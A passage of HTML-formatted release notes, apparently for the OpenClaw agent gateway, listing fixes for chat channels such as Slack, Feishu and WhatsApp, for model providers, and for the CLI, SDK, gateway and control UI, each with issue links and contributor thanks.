<li>Channels/Feishu: retry file-typed iOS video resource downloads as <code>media</code> after a Feishu/Lark HTTP 502 and preserve the original 502 when the fallback also fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095635032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49855/hovercard" href="https://github.com/openclaw/openclaw/issues/49855">#49855</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098933775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50164/hovercard" href="https://github.com/openclaw/openclaw/pull/50164">#50164</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347465827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73986/hovercard" href="https://github.com/openclaw/openclaw/pull/73986">#73986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Providers/Amazon Bedrock: expose the full Claude Opus 4.7 thinking profile (<code>xhigh</code>, <code>adaptive</code>, and <code>max</code>) for Bedrock model refs, while keeping Opus/Sonnet 4.6 on adaptive-by-default, so <code>/think</code> menus and validation match the Anthropic transport behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354600083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74701" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74701/hovercard" href="https://github.com/openclaw/openclaw/issues/74701">#74701</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sparkleHazard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sparkleHazard">@sparkleHazard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/tokenjuice: compile the bundled plugin against tokenjuice 0.7.0's published OpenClaw host types instead of a local compatibility shim, so package contract drift fails in OpenClaw validation before release. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OAuth/secrets: ignore root-level Google OAuth <code>client_secret_*.json</code> downloads so local client-secret files do not appear as commit candidates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354413662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74689" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74689/hovercard" href="https://github.com/openclaw/openclaw/pull/74689">#74689</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeongdulee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeongdulee">@jeongdulee</a>.</li>
<li>Memory: mirror <code>sqlite-vec</code> into packaged bundled-plugin runtime deps for the default memory plugin, so builtin vector search does not lose its SQLite extension after upgrading to 2026.4.27. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354441000" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74692" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74692/hovercard" href="https://github.com/openclaw/openclaw/issues/74692">#74692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mozi1924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mozi1924">@mozi1924</a>.</li>
<li>Gateway/startup: bound local discovery advertisement during startup, so a stuck discovery plugin can no longer keep the Gateway from reaching ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346875416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73865/hovercard" href="https://github.com/openclaw/openclaw/issues/73865">#73865</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>Gateway/models: serve the last successful model catalog while stale reloads refresh in the background, so Gateway control-plane and OpenAI-compatible requests no longer block behind model-provider rediscovery after model config changes. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348343209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74135" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74135/hovercard" href="https://github.com/openclaw/openclaw/issues/74135">#74135</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>CLI/status: resolve read-only channel setup runtime fallback from the packaged OpenClaw dist root, so <code>status --all</code>, <code>status --deep</code>, channel, and doctor paths do not crash when an external channel plugin needs setup metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354478427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74693" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74693/hovercard" href="https://github.com/openclaw/openclaw/issues/74693">#74693</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>SDK/events: keep per-run SDK event streams from surfacing duplicate raw chat projection frames, while normalizing chat-only projection frames and preserving raw access through <code>rawEvents</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354625879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74704/hovercard" href="https://github.com/openclaw/openclaw/issues/74704">#74704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>SDK: report Gateway terminal <code>agent.wait</code> timeout snapshots with lifecycle metadata as <code>timed_out</code> while keeping bare wait deadlines non-terminal. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawsweeper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawsweeper">@clawsweeper</a>.</li>
<li>Google Meet: block managed Chrome intro/test speech until browser health proves the participant is in-call, and expose <code>speechReady</code> diagnostics so login, admission, permission, and audio-bridge blockers no longer look like successful speech. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Slack/commands: keep native command argument menus on select controls for encoded choice values up to Slack's option limit and truncate fallback button labels to Slack's button-text limit, so long valid choices no longer render invalid Slack blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Agents/Codex: flush accepted debounced steering messages before normal app-server turn cleanup, so inbound follow-ups acknowledged as queued are not dropped when the turn completes before the debounce fires. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/interactive replies: keep rendered buttons and selects within Slack Block Kit value and count limits, and align command argument select values with Slack's option limit, so overlong agent-authored choices no longer make Slack reject the whole block payload. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/interactive replies: drop overlong Block Kit button URLs while preserving valid callback values, so malformed link buttons no longer make Slack reject the whole interactive reply. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: truncate native command argument-menu confirmation text to Slack's dialog limit, so long plugin arg names no longer make fallback buttons render invalid Block Kit payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval metadata context to Slack's element and text limits, so large approval details no longer make Slack reject the approval card. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval update fallback text to Slack's message limit while preserving the rendered approval blocks, so long commands no longer make resolved or expired approval cards stay stale after <code>chat.update</code> rejects <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: cap native command argument-menu fallback rows to Slack's message block limit, so large plugin choice lists no longer make Slack reject the generated menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: drop fallback command argument buttons whose encoded values exceed Slack's button-value limit, so one oversized plugin choice no longer makes Slack reject the whole menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: merge message-tool presentation and interactive blocks on Slack sends, so buttons and selects are no longer dropped when a structured message body is also present. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text to Slack's send limit while preserving the rendered blocks, so long context fallbacks no longer make rich Slack messages fail with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text on message edits while preserving the rendered blocks, so long context fallbacks no longer make Slack reject <code>chat.update</code> calls with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Channels/WhatsApp: require Baileys outbound message ids before marking auto-replies delivered, so transcript text and ack reactions no longer make failed group replies look sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090958823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49225" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49225/hovercard" href="https://github.com/openclaw/openclaw/issues/49225">#49225</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>CLI/update: scope packaged Node compile caches by OpenClaw version and install metadata, so global installs no longer reuse stale compiled chunks after package updates. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Channels/Voice call: keep pre-auth webhook in-flight limiting active when socket remote address metadata is missing, so slow-body requests from stripped-IP proxy paths still share the fallback bucket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351826007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74453/hovercard" href="https://github.com/openclaw/openclaw/pull/74453">#74453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Plugin SDK/testing: lazy-load TypeScript from the plugin test-contract runtime and add release checks for critical SDK contract entrypoint imports and bundle size, so published packages fail preflight before shipping ESM-incompatible or oversized contract helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/Microsoft Teams: treat configured <code>19:...@thread.tacv2</code> and legacy <code>19:...@thread.skype</code> team/channel IDs as already resolved during startup, avoiding false <code>channels unresolved</code> warnings while preserving Graph name lookup for display-name entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354343671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74683/hovercard" href="https://github.com/openclaw/openclaw/issues/74683">#74683</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>.</li>
<li>CLI/browser: preserve parent flags while lazy-loading browser subcommands, so <code>openclaw browser --json open</code> and <code>openclaw browser --json tabs</code> keep machine-readable output after reparsing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353127836" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74574/hovercard" href="https://github.com/openclaw/openclaw/issues/74574">#74574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devintegeritsm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devintegeritsm">@devintegeritsm</a>.</li>
<li>Exec/elevated: preserve <code>turnSourceChannel</code> as <code>messageProvider</code> on approval-followup runs so <code>tools.elevated.allowFrom.&lt;provider&gt;</code> checks no longer fail with <code>provider=null</code> after the user approves an async elevated command. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354035233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74646/hovercard" href="https://github.com/openclaw/openclaw/issues/74646">#74646</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xhd2015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xhd2015">@xhd2015</a>.</li>
<li>Plugins/runtime-deps: add <code>openclaw plugins deps</code> inspection and repair with script-free package-manager defaults shared across plugin installers, so operators can repair missing bundled runtime deps without corrupting JSON output or blocking unrelated conflict-free deps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/output: strip internal <code>[tool calls omitted]</code> replay placeholders from user-facing replies while preserving visible reply whitespace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353111354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74573/hovercard" href="https://github.com/openclaw/openclaw/issues/74573">#74573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>Providers/Google Vertex: route authorized_user ADC credentials through OpenClaw's REST transport so Docker installs using gcloud application-default credentials no longer crash in the Google SDK before requests are sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353780535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74628/hovercard" href="https://github.com/openclaw/openclaw/issues/74628">#74628</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhal2001-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhal2001-design">@frankhal2001-design</a>.</li>
<li>ACP/resolver: fall through to thread-bound session resolution when an explicit <code>--session</code> token cannot be resolved while preserving the bad-token diagnostic when no thread binding exists, so Discord slash commands that auto-fill the current thread ID as the positional ACP target no longer return "Unable to resolve session target" errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259261328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66299/hovercard" href="https://github.com/openclaw/openclaw/issues/66299">#66299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/sessions: emit a terminal lifecycle backstop when embedded timeout/error turns return without <code>agent_end</code>, so Gateway sessions no longer stay stuck in <code>running</code> after failover surfaces a timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353527154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74607/hovercard" href="https://github.com/openclaw/openclaw/issues/74607">#74607</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/millerc79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/millerc79">@millerc79</a>.</li>
<li>Gateway/diagnostics: include stuck-session reason hints and recovery skip causes in warnings, so operators can tell whether a lane is waiting on active work, queued work, or stale bookkeeping. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/DeepSeek: expose native DeepSeek V4 <code>xhigh</code> and <code>max</code> thinking levels through the provider <code>resolveThinkingProfile</code> hook so <code>/think xhigh|max</code> applies the intended effort instead of falling back to base levels. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338479166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73008/hovercard" href="https://github.com/openclaw/openclaw/pull/73008">#73008</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Agents/Codex: bound embedded-run cleanup, trajectory flushing, and command-lane task timeouts after runtime failures, so Discord and other chat sessions return to idle instead of staying stuck in processing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/exec: consume successful metadata-only async exec completions silently so Telegram and other chat surfaces no longer ask users for missing command logs after <code>No session found</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353366864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74595/hovercard" href="https://github.com/openclaw/openclaw/issues/74595">#74595</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gkoch02/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gkoch02">@gkoch02</a>.</li>
<li>Web fetch: add a documented <code>tools.web.fetch.ssrfPolicy.allowIpv6UniqueLocalRange</code> opt-in and thread it through cache keys and DNS/IP checks so trusted fake-IP proxy stacks using <code>fc00::/7</code> can work without broad private-network access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350890451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74351/hovercard" href="https://github.com/openclaw/openclaw/issues/74351">#74351</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>OpenAI Codex: restore <code>/verbose full</code> persistence and app-server tool-output forwarding, and retry Gateway E2E temp-home cleanup so debug runs do not regress on stale validation or cleanup flakes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Anthropic/Meridian: preserve text and thinking content seeded on <code>content_block_start</code> in anthropic-messages streams, so <code>[thinking, text]</code> replies no longer persist as empty turns or trigger empty-response fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351435288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74410/hovercard" href="https://github.com/openclaw/openclaw/issues/74410">#74410</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Channels/Matrix: complete the cross-signing handshake on <code>openclaw matrix verify confirm-sas</code> so the operator's other Matrix device clears its <code>Verifying…</code> loop instead of staying stuck after the agent confirms. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352761902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74542/hovercard" href="https://github.com/openclaw/openclaw/pull/74542">#74542</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>.</li>
<li>CLI/status: honor channel-specific model context-window overrides when reporting effective context, so channel-scoped sessions reflect the active window in <code>openclaw status</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sandbox/Docker: tolerate Docker daemon unavailability when sandbox mode is off, so doctor and preflight checks no longer fail on installs that do not run the Docker daemon. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344707479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73671/hovercard" href="https://github.com/openclaw/openclaw/pull/73671">#73671</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaseonedge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaseonedge">@kaseonedge</a>.</li>
<li>Control UI/mobile: persist mobile chat settings through Lit-managed state and route mobile navigation through the same view-state path so chat panel toggles survive transitions on small viewports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/exports: align sidebar trigger affordances across the resizable divider, mobile layout, and exported-HTML transcript template so the sidebar toggle and exported transcript sidebar render with consistent hit areas and styling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: disable the page refresh affordance while a chat run is active so accidental refreshes do not abort an in-flight reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Angfr95/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Angfr95">@Angfr95</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
